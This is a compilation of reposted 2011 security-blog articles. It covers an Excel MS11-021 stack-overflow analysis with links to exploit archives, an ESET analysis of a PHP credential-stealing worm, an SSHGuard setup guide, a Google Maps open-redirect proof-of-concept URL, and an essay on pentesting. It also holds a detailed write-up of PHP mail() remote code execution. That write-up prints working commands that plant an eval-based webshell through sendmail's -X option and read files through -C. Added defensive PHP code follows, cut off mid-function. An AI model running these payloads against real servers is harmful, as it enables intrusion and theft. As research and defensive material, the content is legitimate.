.text:304D4EC7 push dword_30EB89A4
.text:304D4ECD push [ebp+var_C]
.text:304D4ED0 call sub_3053F626
.text:304D4ED5 cmp dword_30F5E64C, ebx
.text:304D4EDB mov [ebp+var_8], eax
.text:304D4EDE jz short loc_304D4EE7
.text:304D4EE0 cmp eax, ebx
.text:304D4EE2 jz short loc_304D4EE7

One of the records that may come after BOF is an undocumented record with record type equal to 0xA7 (167). For proper parsing, this record should come with another record with record type 0x3C (60). If it meets this requirement, the length of the records will be read and copied to the stack. The function which performs the copying of data records onto the stack is sub_30199E55. This function takes three arguments. The first argument specifies the number of bytes to copy, which will be read from the file. The second argument specifies the destination of the copy and the third argument specifies the maximum amount of data that can be copied. The values of the second and third arguments are based on amounts computed from what is read from the file, and it is in this computation that a computational error may occur...
.text:3053F830 call sub_301A0A01
.text:3053F835 cmp eax, 3Ch
.text:3053F838 mov [ebp+var_ED4], eax
.text:3053F83E jnz loc_30540488
.text:3053F844 call sub_301A0A01
.text:3053F849 mov ecx, [ebp+var_EDC]
.text:3053F84F imul ecx, [ebp+var_F00]
.text:3053F856 mov edi, eax
.text:3053F858 mov eax, [ebp+var_EE0]
.text:3053F85E lea ebx, [ecx+eax+3]
.text:3053F862 call sub_301A0ABE
.text:3053F867 push 0FFFFFFFDh
.text:3053F869 pop edx
.text:3053F86A sub edx, ecx
.text:3053F86C add eax, edx
.text:3053F86E push eax ; Dst
.text:3053F86F push ebx ; int
.text:3053F870 mov eax, edi
.text:3053F872 call sub_30199E55

The vulnerability that exists here is that we can change the value of parameter 3 with our own values. The program does not correctly control the third argument of sub_30199E55, and this can result in the desired amount of data overwriting the desired location on the stack.

.text:30199E60 cmp edi, [esp+4+Dst]
.text:30199E64 ja loc_303EE1B7
.text:30199E6A mov ecx, [esp+4+arg_0]
.text:30199E6E push ebx
.text:30199E6F mov ebx, dword_30F726C0
.text:30199E75 push ebp
.text:30199E76 mov ebp, nNumberOfBytesToRead
.text:30199E7C push esi
.text:30199E7D mov [esp+10h+Dst], ecx
....
.text:30199E93 mov eax, [esp+10h+Dst]
.text:30199E97 push esi ; Size
.text:30199E98 lea edx, dword_30F6E6B8[ebx]
.text:30199E9E push edx ; Src
.text:30199E9F push eax ; Dst
.text:30199EA0 sub edi, esi
.text:30199EA2 call memcpy
.text:30199EA7 add [esp+1Ch+Dst], esi
.text:30199EAB add ebx, esi
.text:30199EAD add esp, 0Ch
.text:30199EB0 test edi, edi
.text:30199EB2 mov dword_30F726C0, ebx
.text:30199EB8 jnz loc_301E0DB3

Exploiting :
Stack overflows are not hard to exploit at all! But we have both /GS and SAFESEH here. Because we are destined to memcpy, we can change it so that it begins to overwrite the stack after GS, and from there, when the return comes, our values are contained in ESP and we can call it with a simple call esp and the game is over!!!
Exploit can be downloaded from here : http://www.abysssec.com/blog/wp-content/uploads/2011/11/MS11-021.zip
EDB mirror : http://www.exploit-db.com/sploits/18067.zip

Source: Microsoft Excel 2007 SP2 Buffer Overwrite Exploit
-
Made in the Czech Republic: a PHP Autorun worm
November 3, 2011 at 7:21 am

Recently, a new data-stealing worm caught our attention. The reason why it stands out from many similar amateur creations is that its author is most probably Czech, as the text strings, variable and function names used by the malware suggest. The Czech text above is displayed by the worm inside a console window and translates to: “Initializing. This operation can take several minutes. Please wait…”, pretending to be a message from Microsoft.

But wait, variable and function names used by the programmer? Those aren’t normally seen in a compiled binary unless we have the associated PDB file (Program DataBase: a file format commonly created at compile-time that may list symbols that aren’t stored in the compiled module itself). But in this case, the worm is written entirely in PHP and “converted” to a PE file using the Bambalam PHP EXE Compiler/Embedder. This embedder simply encodes the PHP source files using Turck MMCache and then adds the resulting PHP bytecode as resources in a launcher binary. By decoding these, we were able to get a fairly accurate view of the original source code. So let’s take a look at what the malware actually does…

Installation and Spread

Firstly, we classify it as a worm, as it contains methods for spreading itself. In order to replicate through removable media and modify the infected system to ensure persistence, i.e. that it gets relaunched subsequently, the worm copies its body to the following locations:
The root directory of all mounted volumes, except A: and B:. If the drive size is less than ~32GB, the autorun.inf file is also dropped in the hope of exploiting the (at last!) deprecated AutoRun feature of Windows.
The Documents, Desktop, Start Menu, Start Menu\Programs and Start Menu\Programs\Startup folders for each user on the system and to the All Users Start Menu\Programs folder.
Note that the worm can only copy itself to folders belonging to other users if the worm is run by an administrator account. Also, due to the change of folder naming from Windows Vista onwards, the worm is only able to copy itself to some of the listed folders on earlier Windows systems (such as XP) if it’s a Czech version of the OS. For each of the above mentioned locations, the worm randomly chooses one of the following innocuous-looking file names:
setup.exe
install.exe
fotky.exe
majkl_dzeksn.exe
barunka.exe
martinka.exe

Harvesting data

The purpose of the worm is to collect a large set of sensitive user data and system information, including:
Messages and other information from various IM clients (such as QIP, ICQ, Digsby)
Saved passwords and other information from various browsers (such as IE, Mozilla Firefox, Opera, Chrome)
Saved passwords from common email clients (such as Outlook, Windows Mail, Yahoo! Mail or Gmail)
Emails and other information from various email clients (such as Outlook, Outlook Express, Mozilla Thunderbird)
Total Commander FTP passwords
Stored Windows credentials
Windows Address Book contacts
Windows User account properties (excluding password)
Network addresses, open connections, tables and statistics
List of running processes and services
Environment variables
List of all user files and directories
List of recently opened documents
Contents of the Registry
MS Windows and MS Office Product Keys

The list of types of data that the worm harvests from the infected machine is quite long, and they are all gathered using various unsophisticated methods. In order to collect most of the data associated with Instant Messaging applications, browsers, and so on, the worm simply uploads all the files from the installation folders of the respective applications.
For information related to Windows user accounts, network connections, running processes, and the Windows Registry, the following shell commands are used:
net user
ipconfig
netstat
arp
tasklist
regedit

Another method employed for collecting the victim’s data is the use of third-party password-extraction utilities by NirSoft. The worm’s binary drops and executes four of these tools and sends their output back to the attacker. The worm uses a simple mechanism for sending the collected data to the remote server. It sends many HTTP POST requests (port 80) containing the stolen data gz-compressed and Base64 encoded.

As you can see from the description above, the worm lacks the sophistication of some of the more advanced malware that we sometimes see. Yet, unfortunately, even these simple threats often get the job done. Given the very low prevalence of this malware, the fact that at the time of this writing 100% of the detections came from the Czech Republic, and its apparent Czech origin, there is a possibility that this tool was used in a targeted attack on a specific victim. Or it may just have been an experiment by an amateur malware-writer. Or both.

ESET detects this worm as Win32/AutoRun.PSW.Agent.E. The malware analysis was done by Jakub Horky.

Robert Lipovsky
Malware Researcher

Source: http://blog.eset.com/2011/11/03/made-in-the-czech-republic-a-php-autorun-worm
-
Protect your server with SSHGuard

I’ve already talked about fail2ban and logcheck, 2 tools that can scan your logs and take actions based on rules that you can give/modify, usually modifying your iptables rules to stop active attacks against your server or simply sending you a warning if something is found in the logs. Today we’ll see a similar tool, sshguard; it is different from the other two in that it is written in C, so it uses less memory and CPU while running, but still achieves the same results.

So what does sshguard do?

The short version is: it receives log messages, it detects when a networked service has been abused based on them, and blocks the address of who abused it; after some time, it releases the blocking.

The full version is: sshguard runs on a machine as a small daemon, and receives log messages (in a number of ways, e.g. from syslog). When it determines that address X did something bad to service Y, it fires a rule in the machine’s firewall (one of the many supported) for blocking X. Sshguard keeps X blocked for some time, then releases it automatically.

Please note that despite its name sshguard detects attacks for many services out of the box, not only SSH but also several ftpds, Exim and dovecot. It can operate all the major firewalling systems, and features support for IPv6, whitelisting, suspension, and log message authentication.

Installation

Sshguard is distributed under the permissive BSD license: you can use, modify and redistribute the software, at your own risk, for any use, including commercial, provided that you retain the original copyright notice you find in it. The software is distributed in the main repository of the most used GNU/Linux distributions and for some *BSD systems, but you can also download the sources from their download page.
To install it on Debian (or other .deb distributions like Ubuntu) just run from a terminal:

sudo aptitude install sshguard

Setup and configuration

Sshguard interfaces to the system in two points:
the logging system (how sshguard receives log messages to monitor)
the firewall (how sshguard blocks naughty addresses)

Since version 1.5, sshguard comes with the Log Sucker. With the Log Sucker, SSHGuard fetches log entries proactively, and handles transparently events like rotated log files and files disappearing and reappearing. In the official documentation page there are instructions for many different firewalls; I’ll follow the instructions for netfilter/iptables.

sshguard does not have a configuration file. All configuration that has to be done is creating a chain named “sshguard” in the INPUT chain of iptables where sshguard automatically inserts rules to drop packets coming from bad hosts:

# for regular IPv4 support:
iptables -N sshguard
# if you want IPv6 support as well:
ip6tables -N sshguard

Now update the INPUT chain so it can pass all the traffic to sshguard; specify with --dport all the ports of the services that you want to protect with sshguard.
If you want to prevent attackers from doing any traffic to the host, remove the option completely:

# block any traffic from abusers
iptables -A INPUT -j sshguard
ip6tables -A INPUT -j sshguard

-- or --

# block abusers only for SSH, FTP, POP, IMAP services (use "multiport" module)
iptables -A INPUT -m multiport -p tcp --destination-ports 21,22,110,143 -j sshguard
ip6tables -A INPUT -m multiport -p tcp --destination-ports 21,22,110,143 -j sshguard

If you do not currently use iptables and just want to get sshguard up and running without any further impact on your system, these commands will create and save an iptables configuration that does absolutely nothing except allowing sshguard to work:

# iptables -F
# iptables -X
# iptables -P INPUT ACCEPT
# iptables -P FORWARD ACCEPT
# iptables -P OUTPUT ACCEPT
# iptables -N sshguard
# iptables -A INPUT -j sshguard
# /etc/rc.d/iptables save

Conclusions

And that’s all you need to do to have a basic installation of sshguard up and running; it will help you to have your ssh, ftp and other daemons a bit more secure.

Source: http://linuxaria.com/recensioni/protect-your-server-with-sshguard?lang=en
-
Might be useful to some:

*# Date:* 2.11.2011
*# Author:* Sony
*# Blog : st2tea

http://maps.google.com/m/preferences?pref=s&bl=//st2tea.blogspot.com&hl=1&safe=strict&safe=images&safe=off&gwt=on&gwt=off&lochist=on&lochist=off&sigp=pref%20bl&sig=AMctaOIRgcTAHYXz1KuVsPHwVpqFKrQCJg

or

http://maps.google.com/m/preferences?pref=s&bl=//%73%74%32%74%65%61%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D&hl=1&safe=strict&safe=images&safe=off&gwt=on&gwt=off&lochist=on&lochist=off&sigp=pref%20bl&sig=AMctaOIRgcTAHYXz1KuVsPHwVpqFKrQCJg

Mirror: Google Maps Open Redirect (Packet Storm)

Source: st2tea: Google Maps Open Redirect
-
Vulnerability Assessment vs Penetration Testing

Few topics in the infosec world create as much heat as the classic "vulnerability assessment vs. penetration test” debate, and it’s no different in the web application security space. Sadly, the discussion isn’t usually around which is better. That would actually be an improvement. Instead the debate is usually semantic in nature, i.e. the flustered participants are usually disagreeing on what the terms actually mean. Step 1: agree on terms. So, I’ll be ambitious here and will tackle both subcomponents of the debate here: 1) what the terms actually mean, and 2) which is better for organizations to pursue.

Web Vulnerability Assessment vs. Web Penetration Test

It’s worth stating explicitly that these two types of security test are in fact quite different. Many make the mistake of thinking that a penetration test is simply a vulnerability assessment with exploitation, or that a vulnerability assessment is a penetration test without exploitation. This is incorrect. If that were the case then we’d simply have one term that we’d qualify with “with or without exploitation". A web application vulnerability assessment is fundamentally different from a penetration test because its focus is on creating a list of as many findings as possible for a given web application. A penetration test, on the other hand, has a completely different purpose. Rather than yield a list of problems, a penetration test’s focus is the achievement of a specific goal set by the customer, e.g. "dump the customer database", or "become an administrative user within the application". Also important to note is the fact that a penetration test is successful if and when the goal is achieved–not when a massive list of vulnerabilities is produced. That’s what a vulnerability assessment is for. Some are tempted to say that this is a goal-based penetration test. My question to them is simple: "As opposed to what other type?" Penetration testing is goal-based.
That’s its entire purpose. Even a customer direction as nebulous as "see what you can do" is absolutely a goal. It’s an implicit goal of getting as far as you can given whatever constraints are in place. The question of exploitation is another obstacle to clarity on this topic. Many have a simple binary switch for using the terms: "If there’s exploitation it’s a penetration test and if not it’s a vulnerability assessment." Again, the key difference here is list-based vs. goal-based–not exploitation. It’s possible to do (or not do) exploitation in both types of test. You can have a web vulnerability assessment where you are to exploit anything you find, and you can have a penetration test where you are asked to confirm that you can do something but not do it. Exploitation is an independent attribute that can be attached to either type of test.

When to Use One vs. the Other

Now that we see a distinction between terms, the next question is, "Which one is best?" Which should we be offering customers? As you may expect, the answer is that it depends on the customer and the project, but in my experience the answer will usually end up being a vulnerability assessment. Why? Because vulnerability assessments (getting a list of everything that needs fixing) are usually where most customers are in terms of maturity.

To tightly summarize:

via h30499.www3.hp.com

Daniel's dissertation on this matter is excellent. As the security landscape changes we will see more actual pentests occur, but right now most of what your testers are doing are assessments sold as pentests. That isn’t a bad thing. Pentesting is sexy because it has been marketed that way, not necessarily because it is better (or even a more fun project to work on) but because it fits a FUD marketing niche. When I DO do an actual penetration test I prefer pentests with open goals where, within the context of a business, my team can go after what they think affects the business the most.
It’s an important distinction that what the business "thinks" is the crown jewels and keeps them running (or is most valuable) is not actually what can hurt them the most. Some of our best attacks have been side channel, crazy things that have shown some of our awesome customers better ways to secure themselves. Assessments and Pentests will probably continue to be muddled terms hacked together by sales guys who work for bad consultancies for years to come. It’s important for testers and PMs to know the real differences though. There is an even longer version of this discussion on his blog (http://danielmiessler.com/writing/va_vs_pt/#).

November 2, 2011 Jhaddix

Source: http://www.securityaegis.com/vulnerability-assessment-vs-penetration-testing/
-
Using mail() for Remote Code Execution
Submitted by geoffrey on Thu, 11/03/2011 - 15:30

Last week we had to assess the security level of a PHP web application from its source code, in a white-box context. During this audit we found original ways to take advantage of the mail() function for remote code execution and file disclosure attacks while bypassing open_basedir. This article explains the approaches used for that type of audit, how PHP handles the mail function and how to perform such attacks using it.

Methodologies

There are three well known approaches to audit an application from its source code. The first one is the top-down approach, which consists of starting from an entry point of the program and following all code branches. The second method is the bottom-up approach: the auditor first establishes a list of interesting functions to audit and identifies code areas where user inputs are used. There are pros and cons for both methods. The first one is time consuming but covers all the source code and provides a great understanding of how the application works. The latter one is a time saver and focuses on areas which are the most likely to be vulnerable, but doesn't follow all code branches and skips some kinds of vulnerabilities, for example logic issues. Note that there is also another way which combines the benefits of each method and tries to limit their disadvantages: the hybrid method.

Vulnerable code

In our approach we decided to use a top-down methodology and after a short time we saw this piece of code (recreated due to confidentiality reasons) which at first glance seems normal:

$mail = new sendMail;
$mail->setTo(input::post('to'));
$mail->setSubject(input::post('subject'));
$mail->setFrom(input::post('from'));
$mail->setMessage(input::post('message'));
$mail->send();

The method input::post is in fact a simple wrapper to get values from the $_POST array, controlled by the user.
Next the setFrom function is called, which looks like the following:

if (preg_match('#^[a-zA-Z0-9_.-]+@[a-zA-Z0-9-]+.[a-zA-Z0-9-.]+#', $from))
    $this->from = (string) $from;

The meta-character $ is not used, so the check made with preg_match can be bypassed because the regex will only be applied to the first part of the subject, not all of it. After setting different parameters, the send function is executed:

mail($this->to, $this->subject, $this->message, ..., "-f{$this->from}");

We can see that the variable from, controlled by the user, is passed to the fifth parameter of the mail function.

Analysing mail()

Using Reflection from the shell we can quickly know how the mail function works:

php --rf mail
Function [ <internal:standard> function mail ] {
  - Parameters [5] {
    Parameter #0 [ <required> $to ]
    Parameter #1 [ <required> $subject ]
    Parameter #2 [ <required> $message ]
    Parameter #3 [ <optional> $additional_headers ]
    Parameter #4 [ <optional> $additional_parameters ]
  }
}

In our case we control several parameters passed to mail but the most interesting seems to be the fifth one. Quoting php.net:

The additional_parameters parameter can be used to pass additional flags as command line options to the program configured to be used when sending mail, as defined by the sendmail_path configuration setting. For example, this can be used to set the envelope sender address when using sendmail with the -f sendmail option.

What we want to know now is how the command line options are passed to sendmail. For example we could try to exploit an escape shell vulnerability or abuse sendmail options.
In order to do so we downloaded the PHP 5.3.0 source code and found that the code which handles mail is situated in ext/standard/mail.c:

/* {{{ proto int mail(string to, string subject, string message [, string additional_headers [, string additional_parameters]])
   Send an email message */
PHP_FUNCTION(mail)
{
    char *to=NULL, *message=NULL, *headers=NULL;
    char *subject=NULL, *extra_cmd=NULL;
    int to_len, message_len, headers_len = 0;
    int subject_len, extra_cmd_len = 0, i;
    char *force_extra_parameters = INI_STR("mail.force_extra_parameters");
    char *to_r, *subject_r;
    char *p, *e;

    if (PG(safe_mode) && (ZEND_NUM_ARGS() == 5)) {
        php_error_docref(NULL TSRMLS_CC, E_WARNING, "SAFE MODE Restriction in effect. The fifth parameter is disabled in SAFE MODE");
        RETURN_FALSE;
    }

    if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "sss|ss", &to, &to_len, &subject, &subject_len, &message, &message_len, &headers, &headers_len, &extra_cmd, &extra_cmd_len) == FAILURE) {
        return;
    }

As you can see the safe_mode implementation is not centralised: for each function concerned by this directive, the developers must consider all safe_mode directives and ensure that they are properly applied, otherwise you can bypass that protection. That is one of the many reasons why this directive is now turned off by default. In the case of mail, the use of the fifth parameter is restricted when safe_mode is enabled, which is why the number of arguments passed to the function is checked. Then the zend_parse_parameters function is called and extra_cmd is set with the fifth parameter.

    if (force_extra_parameters) {
        extra_cmd = php_escape_shell_cmd(force_extra_parameters);
    } else if (extra_cmd) {
        extra_cmd = php_escape_shell_cmd(extra_cmd);
    }

    if (php_mail(to_r, subject_r, message, headers, extra_cmd TSRMLS_CC)) {
        RETVAL_TRUE;

The variable extra_cmd is then passed to php_escape_shell_cmd which escapes special characters that can be used to execute other commands. Finally the php_mail function is called.
/* {{{ php_mail */
PHPAPI int php_mail(char *to, char *subject, char *message, char *headers, char *extra_cmd TSRMLS_DC)
{
    ... snip ...
    FILE *sendmail;
    int ret;
    char *sendmail_path = INI_STR("sendmail_path");
    char *sendmail_cmd = NULL;
    char *mail_log = INI_STR("mail.log");
    char *hdr = headers;
    ... snip ...

    if (extra_cmd != NULL) {
        spprintf(&sendmail_cmd, 0, "%s %s", sendmail_path, extra_cmd);
    } else {
        sendmail_cmd = sendmail_path;
    }
    ... snip ...
    sendmail = popen(sendmail_cmd, "w");

PHP then retrieves the value of the sendmail_path directive and uses spprintf to create the command line sendmail_cmd, which is then passed to popen. Let's take an example to see what the final command will look like:

(gdb) file php
Reading symbols from /opt/php-5.3.0/sapi/cli/php...done.
(gdb) set args -r 'mail("a@b.com", "s", "m", "", "-arg val");'
(gdb) b mail.c:291
Breakpoint 1 at 0x83f39b2: file /opt/php-5.3.0/ext/standard/mail.c, line 291.
(gdb) r
Starting program: /opt/php-5.3.0/sapi/cli/php -r 'mail("a@b.com", "s", "m", "", "-arg val");'
[Thread debugging using libthread_db enabled]

Breakpoint 1, php_mail (to=0x8b5c2b8 "a@b.com", subject=0x8b5c2ec "s", message=0x8b5be2c "m", headers=0x8b5be9c "", extra_cmd=0x8b5c31c "-arg val") at /opt/php-5.3.0/ext/standard/mail.c:291
291 sendmail = popen(sendmail_cmd, "w");
(gdb) p sendmail_path
$1 = 0x89af284 "/usr/sbin/sendmail -t -i "
(gdb) p sendmail_cmd
$2 = 0x8b5c35c "/usr/sbin/sendmail -t -i -arg val"

Now that we have a great understanding of how mail works we can focus on the exploitation step. The sendmail program provides several parameters and options which are well documented in this document. Exploiting sendmail is a known subject but the context we are facing is really different from what actually exists: we can only pass parameters escaped with php_escape_shell_cmd to it.
Code execution

The main idea to implement this type of attack was to send a special string which contains PHP code into the SMTP message, and use sendmail features to log the message in a file with a php extension. This implies that we must have write rights to create/modify the targeted file. After some research we saw that the -X parameter could be used to log the traffic between the client and the MTA: this is exactly what we are looking for. In order to see which parameters can be used to inject PHP code in the log file, we tested each of them:

# PHPFROM="<?php CLI; ?>"
# SUBJECT="<?php SUBJECT; ?>"
# MESSAGE="<?php BODY; ?>"
# HEADERS="<?php HEADER; ?>"
# PARAMS="-f\'${PHPFROM}\' -OQueueDirectory=/tmp -X /var/www/uploads/back.php"
# php -r "mail('a@b.c', '${SUBJECT}', '${MESSAGE}', '${HEADERS}', '${PARAMS}');"

Parameters passed to sendmail will bypass the restrictions imposed by open_basedir because this directive only checks paths used in a PHP context. The content of the created file was the following:

03785 <<< To: a@b.c
03785 <<< Subject: <?php SUBJECT; ?>
03785 <<< X-PHP-Originating-Script: 1000:Command line code
03785 <<< <?php HEADER; ?>
03785 <<<
03785 <<< <?php BODY; ?>
03785 <<< [EOF]
03785 === CONNECT [127.0.0.1]
03785 <<< 220 self.com ESMTP Sendmail 8.14.4/8.14.4/Debian-2ubuntu1;...
03785 >>> EHLO self.com
03785 <<< 250-self.com Hello localhost [127.0.0.1], pleased to meet you
03785 <<< 250-ENHANCEDSTATUSCODES
03785 <<< 250-PIPELINING
03785 <<< 250-EXPN
03785 <<< 250-VERB
03785 <<< 250-8BITMIME
03785 <<< 250-SIZE
03785 <<< 250-DSN
03785 <<< 250-ETRN
03785 <<< 250-AUTH DIGEST-MD5 CRAM-MD5
03785 <<< 250-DELIVERBY
03785 <<< 250 HELP
03785 >>> MAIL From:<\<\?php.CLI\;.\?\>@self.com> SIZE=119
03785 <<< 250 2.1.0 <\<\?php.CLI\;.\?\>@self.com>... Sender ok
03785 >>> RCPT To:<a@b.c>
03785 >>> DATA
03785 <<< 250 2.1.5 <a@b.c>... Recipient ok
03785 <<< 354 Enter mail, end with "."
on a line by itself
03785 >>> Received: (from yup@localhost)
03785 >>> by self.com (8.14.4/8.14.4/Submit) id p9S9C8p1003785;
03785 >>> Fri, 28 Oct 2011 11:12:08 +0200
03785 >>> Date: Fri, 28 Oct 2011 11:12:08 +0200
03785 >>> From: \<\?php.CLI\;.\?\>@self.com
03785 >>> Message-Id: <201110280912.p9S9C8p1003785@self.com>
03785 >>> X-Authentication-Warning: self.com: yup set sender to \<\?php CLI\; \?\> using -f
03785 >>> X-Authentication-Warning: self.com: Processed from queue /tmp
03785 >>> To: a@b.c
03785 >>> Subject: <?php SUBJECT; ?>
03785 >>> X-PHP-Originating-Script: 1000:Command line code
03785 >>>
03785 >>> <?php HEADER; ?>
03785 >>>

As you can see there is no problem if we control the subject, the message or the headers: the PHP code stored in the file back.php will get executed. But this would add a condition: we should control the fifth parameter and another one. That is the case of the application we audited, but we want to search for a way to exploit it even if we only control the last parameter. The fifth parameter is escaped and will not result in PHP code execution, but we found a way to bypass that by putting the character @ into the from (-f) parameter passed to sendmail:

# PHPFROM="<?php CLI;/*@*/ ?>"
# SUBJECT=;MESSAGE=;HEADERS=;
# PARAMS="-f\'${PHPFROM}\' -OQueueDirectory=/tmp -X /var/www/uploads/back.php"
# php -r "mail('a@b.c', '${SUBJECT}', '${MESSAGE}', '${HEADERS}', '${PARAMS}');"

Which results in:

06532 >>> MAIL From:<\<\?php.CLI\;/\*@\*/\?\>> SIZE=72
06532 <<< 250 2.1.0 <\<\?php.CLI\;/\*@\*/\?\>>... Sender ok
06532 >>> RCPT To:<a@b.c>
06532 >>> DATA
06532 <<< 553 5.1.8 <a@b.c>... Domain of sender address <?php.CLI;/*@*/?> does not exist

When we put the character @, sendmail tries to resolve the domain */?>.com by making a DNS query. Because the domain doesn't exist it outputs an error with the email of the sender formatted: spaces are replaced by dots and magic happens: the character \ is removed.
The effects of php_escape_shell_cmd are now removed, but we must still find a way to execute PHP code without entering whitespace. To do so we checked how the Zend Engine handles the PHP open tags and decides whether or not to execute the code. It uses Lex rules located in Zend/zend_language_scanner.l:

WHITESPACE [ \n\r\t]+
NEWLINE ("\r"|"\n"|"\r\n")
... snip ...
<INITIAL>"<script"{WHITESPACE}+"language"{WHITESPACE}*"="{WHITESPACE}*("php"|"\"php\""|"'php'"){WHITESPACE}*">" {
... snip ...
<INITIAL>"<%=" {
if (CG(asp_tags)) {
... snip ...
<INITIAL>"<?=" {
if (CG(short_tags)) {
... snip ...
<INITIAL>"<%" {
if (CG(asp_tags)) {
... snip ...
<INITIAL>"<?php"([ \t]|{NEWLINE}) {
... snip ...
<INITIAL>"<?" {
if (CG(short_tags)) {

Looking at this code we can conclude that the only open tags which don't require whitespace are short tags, which are enabled by default, and asp tags.

# PHPFROM="<?if(isset(\$_SERVER[HTTP_SHELL]))eval(\$_SERVER[HTTP_SHELL]);/*@*/?>"
# SUBJECT=;MESSAGE=;HEADERS=;
# PARAMS="-f\'${PHPFROM}\' -OQueueDirectory=/tmp -X /var/www/uploads/back.php"
# php -r "mail('a@b.c', '${SUBJECT}', '${MESSAGE}', '${HEADERS}', '${PARAMS}');"

Using these commands, we now have remote code execution on the application:

08744 <<< 553 5.1.8 <a@b.c>... Domain of sender address <?if(isset($_SERVER[HTTP_SHELL]))eval($_SERVER[HTTP_SHELL]);/*@*/?> does not exist

At the end of the audit we also found another way to exploit it even if short_open_tag is turned off: it was found that sendmail replaces the \n character with a space, so we can use the standard open tags.

File disclosure

The -C parameter permits the use of an alternate configuration file. Using this parameter with an invalid configuration file will cause sendmail to output an error for each line it doesn't understand. This can be used to display the content of a targeted file.
# SUBJECT=;MESSAGE=;HEADERS=;
# PARAMS="-C/var/www/phpinfo.php -OQueueDirectory=/tmp -X/var/www/uploads/f.txt"
# php -r "mail('a@b.c', '${SUBJECT}', '${MESSAGE}', '${HEADERS}', '${PARAMS}');"

These commands are used to write the content of the file phpinfo.php to f.txt:

04151 >>> /var/www/phpinfo.php: line 1: unknown configuration line "<?php"
04151 >>> /var/www/phpinfo.php: line 3: unknown configuration line "phpinfo();"
04151 >>> /var/www/phpinfo.php: line 5: unknown configuration line "?>"
04151 >>> No local mailer defined

Note also that if you are having trouble with the method explained previously to obtain remote code execution, you can use this parameter: if you can inject PHP code into a file located on the webserver (e.g. session files, apache logs, etc.), you can then write its content into a php file and execute it.

Conclusion

In this audit, the vulnerability was caused by only one missing character, which led us to remote code execution. Entering PHP internals helped us to see the protections applied, to gain a good understanding of how mail was handled and later, thanks to the Lex rules, to know how to bypass the condition about spaces. In the exploitation part we also showed how to circumvent the conditions added by php_escape_shell_cmd and short_open_tag. Finally, the most important things to keep in mind are the methodology, the tests and the research we did, not the final exploitation itself.

Source: Using mail() for Remote Code Execution | Sogeti ESEC Pentest

See also the links in the article.
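The root cause described in the article is that attacker-influenced data reaches mail()'s fifth argument, and escapeshellcmd() (which mail() applies to it) is not a fix, because sendmail strips the backslashes again in its own error output. The following wrapper is an added example, my own code rather than anything from the article or from PHP itself: it never forwards caller data into additional_parameters and only builds a -f option from an address that passes a whitelist. Function names, the allowed-domain list and the example.com addresses are assumptions for the demo.

```php
<?php
// Added example (not from the Sogeti article or from PHP): a wrapper around
// mail() in which the only caller-influenced part of the fifth argument is
// the envelope sender, and only after it passes a whitelist. sendmail
// options such as -X, -C or -O can therefore never be appended.
// Assumptions: function names, the allowed domain list, example.com addresses.

declare(strict_types=1);

/**
 * Build the "-f<address>" string for mail()'s additional_parameters, or
 * return null when the candidate must be rejected.
 */
function safe_envelope_sender(string $candidate, array $allowedDomains): ?string
{
    // 1. Syntactic check: exactly one well-formed address, no whitespace.
    if (filter_var($candidate, FILTER_VALIDATE_EMAIL) === false) {
        return null;
    }
    // 2. Whitelist the character set. mail() backslash-escapes shell
    //    metacharacters, but the escaped bytes still reach sendmail, which
    //    removes the backslashes again in its error output (see the 553
    //    responses on this page), so transforming input is not a substitute
    //    for only accepting what we expect.
    if (!preg_match('/^[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+$/', $candidate)) {
        return null;
    }
    // 3. Only domains this application is allowed to use as bounce address.
    $domain = strtolower(substr($candidate, strrpos($candidate, '@') + 1));
    if (!in_array($domain, $allowedDomains, true)) {
        return null;
    }
    return '-f' . $candidate;
}

/**
 * Send a notification with a fixed, server-controlled parameter set.
 * Returns false instead of falling back to an unsafe call.
 */
function send_notification(string $to, string $subject, string $body, string $envelopeSender): bool
{
    // CRLF in To/Subject is header injection, a separate bug class; refuse it too.
    if (preg_match('/[\r\n]/', $to . $subject)) {
        return false;
    }
    $params = safe_envelope_sender($envelopeSender, ['example.com']);
    if ($params === null) {
        error_log('send_notification: rejected envelope sender ' . var_export($envelopeSender, true));
        return false;
    }
    $headers = "From: noreply@example.com\r\nContent-Type: text/plain; charset=UTF-8";
    return mail($to, $subject, $body, $headers, $params);
}

/**
 * Constructed inputs exercising the whitelist; throws if a case misbehaves.
 */
function self_check(): void
{
    $allowed = ['example.com'];
    $mustReject = [
        "-f'bounce@example.com' -OQueueDirectory=/tmp -X /var/www/uploads/back.php",
        'bounce@example.com -X/var/www/uploads/f.txt',
        "bounce@example.com\n-C/etc/passwd",
        'attacker@evil.invalid',           // syntactically fine, wrong domain
        'bounce@example.com@evil.invalid', // two '@': fails FILTER_VALIDATE_EMAIL
    ];
    foreach ($mustReject as $input) {
        if (safe_envelope_sender($input, $allowed) !== null) {
            throw new RuntimeException("accepted unsafe sender: $input");
        }
    }
    if (safe_envelope_sender('bounce@example.com', $allowed) !== '-fbounce@example.com') {
        throw new RuntimeException('rejected a valid sender');
    }
}

self_check();
echo "envelope sender whitelist OK\n";
```

The wrapper also sidesteps the open_basedir point made above: since the application never passes a path to sendmail, there is nothing for open_basedir to miss. If an application genuinely needs other sendmail options, they belong in a constant in the code, not in anything derived from a request.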
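The Lex rules quoted in the article are also a precise specification of what a defender should look for when sweeping files that must never contain PHP (sendmail -X logs, upload directories, session files). The scanner below is an added example, my own code rather than the article's or the Zend Engine's: it mirrors those rules, including the detail that "<?php" glued to a non-whitespace character is only a short tag and that a newline after "<?php" counts as whitespace. Function names and the sample log are constructed for the demo.

```php
<?php
// Added example (not from the article or from PHP's sources): a scanner that
// mirrors the Zend lexer rules quoted above, so files that must never hold
// PHP can be swept for anything the engine would execute. As on the page:
// "<?php" needs a following space, tab or newline; "<?" and "<?=" depend on
// short_open_tag; "<%" and "<%=" on asp_tags; "<script language=php>" is
// always recognised. Open tags are matched case-insensitively, as the engine
// does. Function names and the sample input are assumptions for this demo.

declare(strict_types=1);

/**
 * Return every open tag in $content as ['kind', 'offset', 'tag'] entries,
 * honouring the same ini switches the Zend scanner consults.
 */
function find_php_open_tags(string $content, bool $shortOpenTag = true, bool $aspTags = false): array
{
    // Alternation order matters: PCRE takes the first alternative that matches,
    // so the longer "<?php " and "<?=" forms are listed before the bare "<?".
    $alternatives = [
        'php'    => '<\?php(?:[ \t]|\r\n|\r|\n)',
        'script' => '<script[ \n\r\t]+language[ \n\r\t]*=[ \n\r\t]*(?:php|"php"|\'php\')[ \n\r\t]*>',
    ];
    if ($shortOpenTag) {
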